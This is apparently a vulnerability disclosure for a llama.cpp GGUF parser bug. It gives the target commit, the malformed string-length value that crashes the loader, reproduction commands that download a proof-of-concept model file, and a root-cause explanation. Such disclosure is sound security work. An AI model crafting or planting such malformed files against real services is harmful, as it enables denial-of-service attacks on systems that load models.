
PoC: llama.cpp GGUF Scalar String → std::terminate() DoS

CVE: Pending (submitted to huntr Model Format Vulnerabilities)
Target: ggml-org/llama.cpp commit 492bc31 (b103 / v0.9.7)
File: ggml/src/gguf.cpp — gguf_read_emplace_helper<std::string>(), lines 309–315
Impact: Process termination (SIGABRT) on any binary that loads the model

PoC File

poc_inv_mfv04.gguf — 45 bytes. A valid GGUF v3 file with one KV entry whose string length field is set to 0x8000000000000000, exceeding std::string::max_size() on all 64-bit platforms. This triggers an uncaught std::length_error → std::terminate() → SIGABRT.

Reproduce

git clone https://github.com/ggml-org/llama.cpp
cd llama.cpp
cmake -B build -DCMAKE_BUILD_TYPE=Release
cmake --build build --parallel --target llama-gguf-split
wget https://huggingface.co/jrey8343/poc-llama-cpp-gguf-dos/resolve/main/poc_inv_mfv04.gguf
./build/bin/llama-gguf-split --split --dry-run poc_inv_mfv04.gguf /tmp/_out
# Expected: process aborts on the uncaught std::length_error. With libc++:
#   libc++abi: terminating due to uncaught exception of type std::length_error
# (libstdc++ prints "terminate called after throwing an instance of 'std::length_error'")
# Exit code: -6 (SIGABRT)

Root Cause

The array-of-strings path in gguf_read_emplace_helper is wrapped in a try/catch for std::length_error. The scalar string path (is_array = false) has no such guard: it calls dst.resize() with the attacker-controlled length unchecked, so the resulting std::length_error propagates uncaught and the process terminates.
